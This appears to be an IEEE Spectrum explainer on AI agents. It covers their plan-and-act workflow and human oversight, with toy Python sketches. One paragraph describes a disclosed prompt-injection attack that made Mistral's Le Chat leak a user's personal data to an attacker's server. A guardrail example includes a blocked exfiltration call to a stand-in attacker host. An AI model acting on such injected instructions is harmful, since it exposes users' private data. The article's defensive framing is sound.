The artificial intelligence world is abuzz with talk of AI agents. Microsoft recently released a set of autonomous agents that could help streamline customer service, sales, and supply chain tasks. Similarly, OpenAI unveiled Swarm, an experimental framework for exploring coordination among multiple AI agents. Meanwhile, Claude, the large language model (LLM) from Anthropic, is taking agentic AI to the next level with its computer use capability, now in beta: moving a mouse cursor around the screen, clicking buttons, and typing text using a virtual keyboard.
So, what exactly are AI agents?
“AI agents are advanced artificial intelligence systems that are able to complete a task or make a decision,” says Adnan Ijaz, director of product management for Amazon Q Developer, an AI-powered software development assistant from Amazon Web Services (AWS). “Humans set the goal, and agents figure out on their own, autonomously, the best course of action.” The agents can interface with external systems to take action in the world.
In addition to this autonomy, agentic AI can also receive feedback and continually improve on a task, says Yoon Kim, an assistant professor at MIT’s Computer Science and Artificial Intelligence Laboratory.
Think of AI agents as a more capable version of generative AI. While both technologies rely on LLMs as their underlying model, generative AI creates new content based on the patterns it learned from its training data. Agentic systems, on the other hand, can not only generate content but also take action based on the information they gather from their environment. “So all of that is essentially a step further than generative AI,” Ijaz says.
How AI Agents Work
To fulfill a particular task, AI agents usually follow a three-part workflow. First, they determine the goal through a user-specified prompt. Next, they figure out how to approach that objective by breaking it down into smaller, simpler subtasks and collecting the needed data. Finally, they execute tasks using what’s contained in their knowledge base plus the data they’ve amassed, making use of any functions they can call or tools they have at their disposal.
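In code, that workflow reduces to a simple loop. Here’s a minimal, framework-agnostic Python sketch; the plan and execute_step functions and the hard-coded subtasks are hypothetical stand-ins for the LLM calls and tools a real agent would use, not any particular framework’s API.

```python
# A minimal sketch of the three-part agent workflow:
# 1) take a user-specified goal, 2) break it into subtasks,
# 3) execute each subtask with the tools and knowledge available.
# All names and the hard-coded plan are illustrative stand-ins.

def plan(goal: str) -> list[str]:
    """Decompose a goal into subtasks. A real agent would ask an LLM."""
    return [f"gather data for: {goal}", f"act on: {goal}"]

def execute_step(step: str, tools: dict, knowledge: dict) -> str:
    """Run one subtask with an appropriate tool."""
    tool = tools["search"] if step.startswith("gather") else tools["act"]
    return tool(step, knowledge)

def run_agent(goal: str, tools: dict, knowledge: dict) -> list[str]:
    results = []
    for step in plan(goal):                               # decompose
        results.append(execute_step(step, tools, knowledge))  # execute
    return results

if __name__ == "__main__":
    tools = {
        "search": lambda step, kb: f"[searched] {step}",
        "act":    lambda step, kb: f"[acted] {step} (user: {kb['user']})",
    }
    print(run_agent("book the cheapest flight", tools, {"user": "Jane Doe"}))
```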
Let’s take booking flights as an example, and imagine a prompt to “book the cheapest flight from A to B on Y date.” An AI agent might first search the web for all flights from A to B on Y date, scan the search results, and select the lowest-priced flight. The agent then calls a function that connects to the application programming interface (API) of the airline’s flight booking platform. The agent makes a booking for the chosen flight, entering the user’s details based on the information stored in its knowledge base.
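A toy version of that flow might look like the following Python sketch, where search_flights and book_flight are invented stand-ins for a real web search tool and an airline’s booking API.

```python
# Hypothetical flight-booking flow: gather data, reason over it, act.
# The flight data and "API" here are stubs invented for illustration.

def search_flights(origin: str, dest: str, date: str) -> list[dict]:
    """Stand-in for a web search; a real agent would call a search tool."""
    return [
        {"flight": "XY123", "price": 240, "seats_left": 3},
        {"flight": "ZQ456", "price": 199, "seats_left": 0},
    ]

def book_flight(flight: dict, passenger: dict) -> str:
    """Stand-in for a call to an airline booking API."""
    return f"confirmed {flight['flight']} for {passenger['name']}"

def book_cheapest(origin: str, dest: str, date: str, passenger: dict) -> str:
    flights = search_flights(origin, dest, date)        # gather data
    cheapest = min(flights, key=lambda f: f["price"])   # reason over it
    return book_flight(cheapest, passenger)             # take action

print(book_cheapest("A", "B", "2025-06-01", {"name": "Jane Doe"}))
```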
“The key point of agentic interaction is that the system is able to understand the goal you’re trying to accomplish and then operate on it autonomously,” says Ijaz. However, humans are still in the loop, guiding the process and intervening when required. For instance, the flight-booking AI agent might be instructed to notify the user if the cheapest flight has no available seats, allowing the user to decide on the next step. “If at any point humans don’t think the system is going in the right direction, they can override it—they have control,” Ijaz adds.
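Extending the flight-booking sketch, handing control back to the human can be as simple as an escalation branch. The notify_user hook below is hypothetical; a real system would route the question to a chat window, email, or approval queue and wait for an answer.

```python
# Human-in-the-loop variant: the agent defers to the user when its
# preferred action isn't possible. notify_user is a hypothetical hook.

def notify_user(message: str) -> bool:
    """Stand-in for surfacing a decision to the human."""
    print(f"[agent -> user] {message}")
    return False  # stub: a real system would wait for the user's reply

def book_with_oversight(flights: list[dict], passenger: dict) -> str:
    by_price = sorted(flights, key=lambda f: f["price"])
    cheapest = by_price[0]
    if cheapest["seats_left"] == 0:
        # Escalate to the human instead of deciding autonomously.
        if not notify_user(f"Cheapest flight {cheapest['flight']} is full. "
                           "Approve booking the next-cheapest?"):
            return "paused: waiting on user decision"
        cheapest = by_price[1]
    return f"confirmed {cheapest['flight']} for {passenger['name']}"

flights = [
    {"flight": "XY123", "price": 240, "seats_left": 3},
    {"flight": "ZQ456", "price": 199, "seats_left": 0},
]
print(book_with_oversight(flights, {"name": "Jane Doe"}))
```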
Promises and Pitfalls of Agentic AI
Much like generative AI, agentic AI holds the promise of increased efficiency and improved productivity, with the agent performing mundane tasks that would otherwise be tedious or repetitive for the average human.
“If these systems become trustworthy enough, then we could have agents arrange a calendar for you or reserve restaurants on your behalf—do stuff that you would otherwise have an assistant do,” says Kim.
The keyword there is trustworthy, with data privacy and security as major challenges for agentic AI. “Agents are looking at a large swath of data. They are reasoning over it, they’re collecting that data. It’s important that the right privacy and security guardrails are implemented,” Ijaz says.
For instance, researchers at the University of California San Diego and Nanyang Technological University in Singapore were able to trick AI agents into improper tool use. They created a malicious prompt attack that analyzes a user’s chat session, pulls out personally identifiable information, and formats it into a command that leaks the data to an attacker’s server. The attack worked on Mistral AI’s Le Chat conversational assistant, so the researchers disclosed the security vulnerability to the company, which resulted in a product fix.
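The fix in that case was specific to Le Chat, but one generic guardrail (a simplified assumption here, not the researchers’ method) is to screen a tool call’s arguments for personally identifiable information before letting it execute. A toy Python version:

```python
import re

# Toy guardrail: refuse tool calls whose arguments contain PII-like
# patterns. The patterns and block-on-match policy are deliberately
# simplified; production guardrails are far more sophisticated.

PII_PATTERNS = [
    re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),        # US SSN-like number
    re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),  # email address
    re.compile(r"\b(?:\d[ -]?){13,16}\b"),       # card-number-like digits
]

def guarded_tool_call(tool, url: str, payload: str):
    """Run a tool call only if its arguments look PII-free."""
    for pattern in PII_PATTERNS:
        if pattern.search(payload):
            raise PermissionError("blocked: payload appears to contain PII")
    return tool(url, payload)

# Example: this exfiltration attempt is blocked before any data leaves.
try:
    guarded_tool_call(lambda u, p: f"sent to {u}",
                      "https://attacker.example/collect",
                      "name=Jane Doe; email=jane@example.com")
except PermissionError as e:
    print(e)
```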
Factual accuracy is another issue for AI agents, since they’re built on LLMs that have a problem with hallucinations—the technical term for making things up. Kim notes that while it certainly wouldn’t be desirable to have an AI agent give you the wrong information about flights, such a mistake probably wouldn’t be disastrous. “That’s not as high stakes an application as employing these types of systems in clinical or financial settings,” Kim says, “where the accuracy or lack thereof of the outputs or actions could have serious consequences.”
Agentic AI is still in its early stages, and as AI agents evolve, they’ll hopefully make people’s lives easier and more productive. But caution is still warranted given the risks they pose. “It’s an important advancement, so I think all the attention it’s getting is warranted,” Ijaz says. “Agents are another tool in the armory for humans, and humans will put those tools to good use granted that we build those agents in ways that follow responsible AI practices.”
Rina Diane Caballar is a writer covering tech and its intersections with science, society, and the environment. An IEEE Spectrum Contributing Editor, she's a former software engineer based in Wellington, New Zealand.